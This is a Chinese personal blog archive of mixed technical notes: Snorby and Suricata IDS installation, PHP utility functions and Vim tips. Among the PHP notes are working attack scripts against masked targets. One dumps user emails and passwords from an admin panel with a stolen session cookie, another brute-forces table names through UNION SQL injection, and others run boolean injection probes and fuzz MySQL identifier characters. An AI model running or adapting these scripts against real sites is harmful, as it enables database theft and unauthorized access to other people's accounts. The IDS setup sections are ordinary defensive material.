月度归档:2016年12月
snorby mark
在
bundle exec rake snorby:setup
这一步时始终过不去。
报
No time_zone specified in snorby_config.yml; detected time_zone: US/Eastern 3dd9afd796731d9f406d9cec0088c86e90995d4024acb27fa8710c99a48c1f73e431b6d8957a8de011cad066565c19354c85c5700378efc75d9ca15de46ae2ee [datamapper] Created database 'snorby' rake aborted! TypeError: no implicit conversion of Fixnum into String
看了几遍代码, 没问题,
偶然想到数据库密码为123456
原config/database.yml为:
snorby: &snorby adapter: mysql username: root password: 123456 host: localhost
改为 密码加上双引号:
snorby: &snorby adapter: mysql username: root password: "123456" host: localhost
php mark
#php 日期转换成TZ格式
$time_tz_str = str_replace('+00:00', 'Z', gmdate('c', time()));
#2020-07-21T12:11:11Z
#trim 移除字符串
function strim($string,$removestring){
if (!is_string($string) || !is_string($removestring)){
return $string;
}
$result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string);
return $result;
}
#这样改strim会更好一点
function strim($string,$removestring=''){
if (!is_string($string)){
return $string;
}
if (!$removestring){
return trim($string);
}
$result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string);
return $result;
}
#curl request
function curl_request($url,$post='',$cookie='', $returnCookie=0){
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
curl_setopt($curl, CURLOPT_REFERER, "http://XXX");
if($post) {
curl_setopt($curl, CURLOPT_POST, 1);
//curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
}
if($cookie) {
curl_setopt($curl, CURLOPT_COOKIE, $cookie);
}
curl_setopt($curl, CURLOPT_HEADER, $returnCookie);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1); //ssl 这两行代码是为了能走https的请求,http请求放着也没有影响
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); //ssl 这两行代码是为了能走https的请求,http请求放着也没有影响
$data = curl_exec($curl);
if (curl_errno($curl)) {
return curl_error($curl);
}
curl_close($curl);
if($returnCookie){
list($header, $body) = explode("\r\n\r\n", $data, 2);
preg_match_all("/Set\-Cookie:([^;]*);/", $header, $matches);
$info['cookie'] = substr($matches[1][0], 1);
$info['content'] = $body;
return $info;
}else{
return $data;
}
}
#php remove bom str
function str_remove_bom($str){
$charset[1] = substr($str, 0, 1);
$charset[2] = substr($str, 1, 1);
$charset[3] = substr($str, 2, 1);
if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) {
$rest = substr($str, 3);
return $rest;
} else{
return $str;
}
}
#php实现内存地址反转
function array_endtostart($hex){
$a_tmp=str_split($hex,2);
$result=array_reverse($a_tmp);
$hexstr=join("",$result);
return $hexstr;
}
#php 实现汇编中的pxor
function xortnew($a,$b){
$a_tmp=str_split($a,2);
$b_tmp=str_split($b,2);
$result="";
foreach($a_tmp as $key=>$value){
$a_b=hex2bin($value);
$b_b=hex2bin($b_tmp[$key]);
$r = $a_b ^ $b_b;
$result .=bin2hex($r);
}
return $result;
}
var_dump(xortnew("3e213b21343d3c3e00000002253a600c","0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c"));
#php 查找字符串与替换
function tapreplace($str){
$newstr=preg_replace_callback("/(<pre.*<\/pre>)/s",function ($match){
$text=preg_replace("/\t/"," ",$match[0]);
$text=preg_replace("/'/","'",$text);
$text=preg_replace("/#/","#",$text);
$text=preg_replace("/\"/",""",$text);
$text=preg_replace("/'/","'",$text);
return $text;
},$str);
return $newstr;
}
#dokuwiki在php7下报operator not supported for strings in 错
inc\lessc.inc.php
public $importDir = ''; #改为 public $importDir = array();
#CryptoJS 与php互通
#CryptoJS 中
#128位AES加密
var key = CryptoJS.lib.WordArray.random(16);
var iv = CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
$key_str = hex2bin('xxxxxxx');
$iv_str = hex2bin('xxxxxxx');
$str="xxxxx";
$result =openssl_decrypt($str,'aes-128-cbc',$key_str,false,$iv_str);
#192 aes
var key = CryptoJS.lib.WordArray.random(24);
var iv = CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
$key_str = hex2bin('xxxxxxx');
$iv_str = hex2bin('xxxxxxx');
$str="xxxxx";
$result =openssl_decrypt($str,'aes-192-cbc',$key_str,false,$iv_str);
#256 aes:
var key = CryptoJS.lib.WordArray.random(32);
var iv = CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
$key_str = hex2bin('xxxxxxx');
$iv_str = hex2bin('xxxxxxx');
$str="xxxxx";
$result =openssl_decrypt($str,'aes-256-cbc',$key_str,false,$iv_str);
#php try catch warning
set_error_handler(function($errno, $errstr, $errfile, $errline, array $errcontext) {
// error was suppressed with the @-operator
if (0 === error_reporting()) {
return false;
}
throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
});
#然后直接try就可以了
try{
if (preg_match("/{$rule}/", $result['url'])) {
$end['match']=1;
$end['code_error']=0;
}
if ($result['code'] == 404) {
$end['code_error']=1;
}
}catch (Exception $e){
var_dump($rule);
}
#数组对象转换
/**
* 数组 转 对象
*
* @param array $arr 数组
* @return object
*/
function array_to_object($arr)
{
if (gettype($arr) != 'array')
{
return;
}
foreach ($arr as $k => $v)
{
if (gettype($v) == 'array' || gettype($v) == 'object')
{
$arr[$k] = (object)array_to_object($v);
}
}
return (object)$arr;
}
/**
* 对象 转 数组
*
* @param object $obj 对象
* @return array
*/
function object_to_array($obj)
{
$obj = (array)$obj;
foreach ($obj as $k => $v)
{
if (gettype($v) == 'resource')
{
return;
}
if (gettype($v) == 'object' || gettype($v) == 'array')
{
$obj[$k] = (array)object_to_array($v);
}
}
return $obj;
}
#一个无极限分类
function get_tree($result){
$tree = array();
foreach($result as $item){
if(isset($result[$item['pid']])){
$result[$item['pid']]['son'][] = &$result[$item['pro_id']];
}else{
$tree[] = &$result[$item['pro_id']];
}
}
return $tree;
}
//生成无极限的数据
//用递归展示处理的数据
function getviewdata($data,$level=0){
foreach($data as $key=>$value){
for($i=0;$i<=$level;$i++){
echo '  ';
}
echo $value['pro_name'];
echo '<br>';
if(!empty($value['son'])){
getviewdata($value['son'],$level+1);
}
}
}
getviewdata($xx);
#某脱库脚本
function getuidinfo($i){
sleep(0.5);
$url="http://www.xxx.cn/admin.php?s=/product/order/index/uid/{$i}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
$output = curl_exec($ch);
curl_close($ch);
preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
if(!isset($result[0][0]) || !$result[0][0]){
return array();
}
$tmp_array= explode("\n",$result[0][0]);
if(!$tmp_array){
return array();
}
$result_out=array();
foreach ($tmp_array as $a_tmp){
$a_tmp = trim($a_tmp);
if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
continue;
}
preg_match('#^<td>\d+</td><td>.*</td><td>(.*)</td><td>\d+\.\d+</td><td>[^<]*</td><td>[^<]*</td><td><a[^>]*>([^<]*)</a></td>#',$a_tmp,$a_result);
$result_out[]=$a_result[1];
$account_name = $a_result['2'];
}
if (!isset($account_name)){
return array();
}
$result_out=array_unique($result_out);
$return['email']=$account_name;
$return['pid']=$result_out;
return $return;
}
function getproduct($product_id){
sleep(0.5);
$url="http://www.xxx.cn/admin.php?s=/product/user/index&keyword={$product_id}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
$output = curl_exec($ch);
curl_close($ch);
preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
if(!isset($result[0][0]) || !$result[0][0]){
return array();
}
$tmp_array= explode("\n",$result[0][0]);
if(!$tmp_array){
return array();
}
$result=array();
foreach ($tmp_array as $a_tmp){
$a_tmp = trim($a_tmp);
if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
continue;
}
preg_match('#^<td>\d+</td><td><a[^>]*>[^<]*</a></td><td>[^<]*</td><td>([^<]*)</td>#',$a_tmp,$a_result);
$result=$a_result[1];
}
if(!$result){
return array();
}
return $result;
}
for($i=1;$i<32167;$i++){
$uidinfo = getuidinfo($i);
if(!$uidinfo){
continue;
}
echo $i."\n";
$strs = "uid:{$i} email:".$uidinfo['email'].":";
$pwd_tmp=array();
foreach($uidinfo['pid'] as $pid){
$pwd = getproduct($pid);
if(!$pwd){
continue;
}
$pwd_tmp[]=$pwd;
}
$pwd_tmp=array_unique($pwd_tmp);
$pwd_str =implode("|",$pwd_tmp);
$strs .=$pwd_str."\n";
file_put_contents("pwd.txt",$strs,8);
sleep(0.5);
}
#thinkphp路由模式
http://www.xxx.net/product/index/xxx/id/29192 => http://www.xxx.net/index.php?m=product&c=index&a=xxx&id=29192
#跑表名
set_time_limit(0);
$tables = file("tables");
foreach ($tables as $a_tables){
$a_tables = trim($a_tables);
$url = "http://www.xxx.net/product/index/xxx/id/29192) and 1=1 and 1=2 union select 29192,29192,29192,2,2,4,5,(select id from ss_{$a_tables} where id>1 limit 0,1 ),7,8,9,10,2 -- a";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);
$garbage = strstr($output, "exist");
if($garbage == false)
{
echo $a_tables."<br>";
}
sleep(2);
}
#inject
$i = $_GET['id'];
sleep(1);
$url = "http://xxx.xxx.net/xxx/index/xxx/id/29192) and 1={$i} --";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
#fuzz1
<?php
$con=mysqli_connect("localhost","root","123456","test");
if (mysqli_connect_errno($con))
{
echo 111;
exit;
}
for($i=0;$i<255;$i++) {
for($j=0;$j<255;$j++) {
$char_str = chr($i);
$charj_str = chr($j);
$strs = "select count(*) from `information_schema`{$char_str}{$charj_str}`SCHEMATA`";
$result=mysqli_query($con,$strs);
$posts = array();
while($row = @mysqli_fetch_array($result)) {
$posts[] = $row;
}
if(isset($posts[0]) && $posts[0][0]==10 ){
echo "<font color=red>aaaa</font>{$i}|{$j}<br>";
}
}
}
mysqli_close($con);
#毫秒
list($usec, $sec) = explode(" ", microtime());
$lusec = sprintf('%03d',$usec*1000);
iptable 流程1
suricata nat下部署
Mark:
实验环境:
最好两台真机,至少一台虚拟机一台真机,不推荐两台实验环境都为虚拟机(两台都是虚拟机时, route表中的可能不会生效)
A:172.20.8.42 IPS (功能)
B:172.20.8.8 pc
要求: B –> A –> inetner B若访问的地址存在攻击行为,则阻断
A:
#安装suricata
apt-get install libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0 #解决信赖 wget https://github.com/inliniac/suricata/archive/suricata-3.2.zip unar suricata-3.2.zip cd suricata-3.2 git clone https://github.com/OISF/libhtp.git #suricata 信赖libhtp 放到suricata项目目录中 ./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var make make install make install-conf make install-rules ldconfig
#配置转发环境
echo 1 > /proc/sys/net/ipv4/ip_forward
#配置iptables
iptables -I INPUT -j NFQUEUE && iptables -I OUTPUT -j NFQUEUE &&iptables -I FORWARD -j NFQUEUE && iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j NFQUEUE #若以ids模式运行,则把 NFQUEUE 换成 ACCEPT iptables -t nat -A POSTROUTING -s 172.20.8.5 -j SNAT --to 172.20.8.42 #转发的源地址转换 ,作此步骤才能抓到数据包 ifconfig eth0 -promisc #网卡混杂模式
#修改suricata配置
#suricata.yaml HOME_NET: "![172.20.0.0/16]" #HOME_NET 把外部地址当成目标为自己的就能匹配rules
#启动
suricata -c /etc/suricata/suricata.yaml -q 0
B:
把电脑的网关设置为 172.20.8.42 就行了
#测试注意
最好用浏览器测试:http://xxx.com/xxx.php?id=1 and 1=2 union select id from test where id=1 在/var/log/suricata/fast.log 文件出行记录表示成功
若用curl命令行测试 则应为 curl “http://xxx.com/xxx.php?id=1%20and%201=2%20union%20select%20id%20from%20test%20where%20id=1” #命令行下不会自动把空格转义为%20 若不添加 suricata 识别不了 匹配不了rules
#更新
功能尽量装全
apt-get install libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libprelude-dev liblua5.1-dev libgeoip-dev libhiredis-dev libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0 ./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-unittests --enable-python --enable-debug --enable-debug-validation --enable-profiling --enable-profiling-locks --enable-lua --enable-geoip --enable-pie --enable-prelude
另在NAT转发下会导致服务端丢失真实源ID,所以另拿一台机器做分析,用iptables做端口镜像(或者daemonlogger)
iptables -A INPUT -i eth0 -p tcp -m tcp --sport 80 -j TEE --gateway 172.20.8.147 iptables -A OUTPUT -o eth0 -p tcp -m tcp --dport 80 -j TEE --gateway 172.20.8.147 #注意,input output 都得镜像过来, 就像nat下不添加iptables的源地址转换,就相当于只有input,suricate 在此种情况下不进行protocol分析。
#若只镜像注入的流量,则在suricata.yaml文件中 不过功能会有BUG,建议镜像双向流量
--set stream.async-oneside=true
#另附suricata snort 一键安装脚本
apt-get install wkhtmltopdf gcc g++ build-essential libssl-dev libreadline6-dev zlib1g-dev libsqlite3-dev libxslt-dev libxml2-dev imagemagick git-core libmysqlclient-dev libmagickwand-dev default-jre ruby ruby-dev libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libprelude-dev liblua5.1-dev libgeoip-dev libhiredis-dev mysql-server apache2 apache2-dev libapr1-dev libaprutil1-dev libcurl4-openssl-dev libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev git pkg-config libnss3-dev libnspr4-dev wget mysql-client libmysqlclient-dev libdumbnet-dev libmysqlclient18 flex bison libpq-dev postgresql-server-dev-all libdnet-dev unar
#install suricata begin
cd /tmp
wget https://github.com/inliniac/suricata/archive/suricata-3.2.zip
unar suricata-3.2.zip
cd suricata-suricata-3.2
git clone https://github.com/OISF/libhtp.git #suricata 信赖libhtp 放到suricata项目目录中
./autogen.sh
./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-unittests --enable-python --enable-debug --enable-debug-validation --enable-profiling --enable-profiling-locks --enable-lua --enable-geoip --enable-pie --enable-prelude
make
make install
make install-conf
make install-rules
ldconfig
sed -i "s|windows: [0.0.0.0/0].*|#windows: [0.0.0.0/0]|g" /etc/suricata/suricata.yaml
perl -0777 -i -pe "s/- unified2-alert:\s*enabled:.*/- unified2-alert:\n enabled: yes/g" /etc/suricata/suricata.yaml
#install suricata end
#install snorby begin
gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
source /etc/profile.d/rvm.sh
rvm install ruby-2.2.4
rvm use ruby-2.2.4 --default
gem sources --add https://gems.ruby-china.org/ --remove https://rubygems.org/
gem install thor i18n bundler tzinfo builder memcache-client rack rack-test erubis mail rack-mount rails sqlite3 arel ezprint rake activesupport minitest
bundle config mirror.https://rubygems.org https://gems.ruby-china.org
git clone http://github.com/Snorby/snorby.git --depth=1 /var/www/snorby
cp /var/www/snorby/config/database.yml.example /var/www/snorby/config/database.yml
cp /var/www/snorby/config/snorby_config.yml.example /var/www/snorby/config/snorby_config.yml
sed -i "s/password: .*\$/password: \"123456\"/" /var/www/snorby/config/database.yml
sed -i "s/domain: .*\$/domain: 'localhost:3000'/" /var/www/snorby/config/snorby_config.yml
sed -i "s/wkhtmltopdf: .*\$/wkhtmltopdf: wkhtmltopdf/" /var/www/snorby/config/snorby_config.yml
sed -i "s#rules:#rules: \n - \"/etc/suricata/rules/\"#g" /var/www/snorby/config/snorby_config.yml
cd /var/www/snorby/ && bundle update activesupport railties rails
cd /var/www/snorby/ && bundle install
cd /var/www/snorby/ && bundle exec rake snorby:setup RAILS_ENV=production
chown www-data:www-data /var/www/snorby -R
cat <<EOT >> /etc/apache2/sites-available/snorby.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/snorby/public
<Directory "/var/www/snorby/public">
AllowOverride all
Order deny,allow
Allow from all
Options -MultiViews
</Directory>
</VirtualHost>
EOT
a2dissite 000-default.conf
a2ensite snorby.conf
gem install --no-ri --no-rdoc passenger
cd /var/www/snorby/ && passenger-install-apache2-module -a 2> /tmp/.passenger_error.txt 1> /tmp/.passenger_compile_out
sed -n '/LoadModule passenger_module \/usr\//,/<\/IfModule>/p' /tmp/.passenger_compile_out > /etc/apache2/mods-available/passenger.load
a2enmod passenger
a2enmod rewrite
service apache2 restart
cd /var/www/snorby/ && bundle pack
cd /var/www/snorby/ && bundle install --path vender/cache
service apache2 restart
#install snorby end
#install barnyard2 begin
cd /tmp
wget -q https://www.snort.org/downloads/snort/daq-2.0.6.tar.gz
if [ -d "/tmp/daq-2.0.6" ]; then
rm -r /tmp/daq-2.0.6
fi
tar xzf daq-2.0.6.tar.gz
cd daq-2.0.6
./configure && make && make install
ln -s /usr/include/dumbnet.h /usr/include/dnet.h
cd /tmp/ && git clone https://github.com/firnsy/barnyard2 --depth=1
cd barnyard2
./autogen.sh
autoreconf --force --install
./configure --with-mysql --with-mysql-libraries=/usr/lib/x86_64-linux-gnu/
make && make install
cp /tmp/barnyard2/etc/barnyard2.conf /etc/suricata/
sed -i "s/#config interface:\s\+eth0/config interface: eth0/g" /etc/suricata/barnyard2.conf
sed -i "s/#config daemon/config daemon/g" /etc/suricata/barnyard2.conf
sed -i "s/#config verbose/config verbose/g" /etc/suricata/barnyard2.conf
sed -i "s;#config waldo_file:.*;config waldo_file: /var/log/suricata/suricata.waldo;" /etc/suricata/barnyard2.conf
sed -i "s#config reference_file:\s\+/etc/.*#config reference_file: /etc/suricata/reference.config#g" /etc/suricata/barnyard2.conf
sed -i "s#config classification_file:\s\+/etc/.*#config classification_file: /etc/suricata/classification.config#g" /etc/suricata/barnyard2.conf
sed -i "s#config gen_file:\s\+/etc/.*#config gen_file: /etc/suricata/rules/gen-msg.map#g" /etc/suricata/barnyard2.conf
sed -i "s#config sid_file:\s\+/etc/.*#config sid_file: /etc/suricata/rules/sid-msg.map#g" /etc/suricata/barnyard2.conf
echo "output database: log, mysql, user=root password=123456 dbname=snorby host=localhost sensor_name=sensor1" >> /etc/suricata/barnyard2.conf
mkdir /var/log/barnyard2
cat << 'EOT' >> /etc/init.d/barnyard2
#!/bin/sh
case $1 in
start)
echo "starting $0..."
sudo barnyard2 -c /etc/suricata/barnyard2.conf -d /var/log/suricata -f unified2.alert -w /var/log/suricata/suricata.waldo
echo -e 'done.'
;;
stop)
echo "stopping $0..."
killall barnyard2
echo -e 'done.'
;;
restart)
$0 stop
$0 start
;;
*)
echo "usage: $0 (start|stop|restart)"
;;
esac
EOT
chmod 700 /etc/init.d/barnyard2
update-rc.d barnyard2 defaults 21 00
#install end begin
cd /var/www/snorby
bundle exec rake snorby:update RAILS_ENV=production
suricata -c /etc/suricata/suricata.yaml -i eth0 -D
barnyard2 -c /etc/suricata/barnyard2.conf -d /var/log/suricata -f unified2.alert -w /var/log/suricata/suricata.waldo -D
#开机启动snorby worker
source /etc/profile.d/rvm.sh rvm use ruby-2.2.4 --default cd /var/www/snorby bundle exec rake snorby:update RAILS_ENV=production
#mark
VIM mark
#vim的搜索是否区分大小写
#大小写检索:默认是区分大小写的 :set ignorecase 或者 :set ic #恢复区分大小写: :set noignorecase 或者 :set noic
#vim中删除不包含关键字的行 刚好与g 命令相反
:g/pattern/d 是找到pattern, 删之 :v/pattern/d 是找到非pattern,删之
#vim中删除关键字的行
:g/xxxx/d :g/^xxxx/d :g/xxxx$/d
#修改默认 mouse=v
#文件位置:/usr/share/vim/vim81/defaults.vim
if has('mouse')
set mouse=a
endif
#改为
if has('mouse')
set mouse=v
endif
#AnsiEsc 终端高亮显示到VIM中(如ls grep等结果中的高亮)
#http://www.vim.org/scripts/script.php?script_id=4979 (新版本地址) #https://github.com/powerman/vim-plugin-AnsiEsc (github) wget http://www.vim.org/scripts/download_script.php?src_id=24019 vim AnsiEsc.vmb :so % test: ls -al /etc --color=always > /tmp/a.txt && vim /tmp/a.txt
#编码切换
#先下载fencview.vim到plugin文件夹中 #~/.vim/vimrc "关闭自动检测 let g:fencview_autodetect=0 map <F2> :FencView<cr>
入侵感知体系
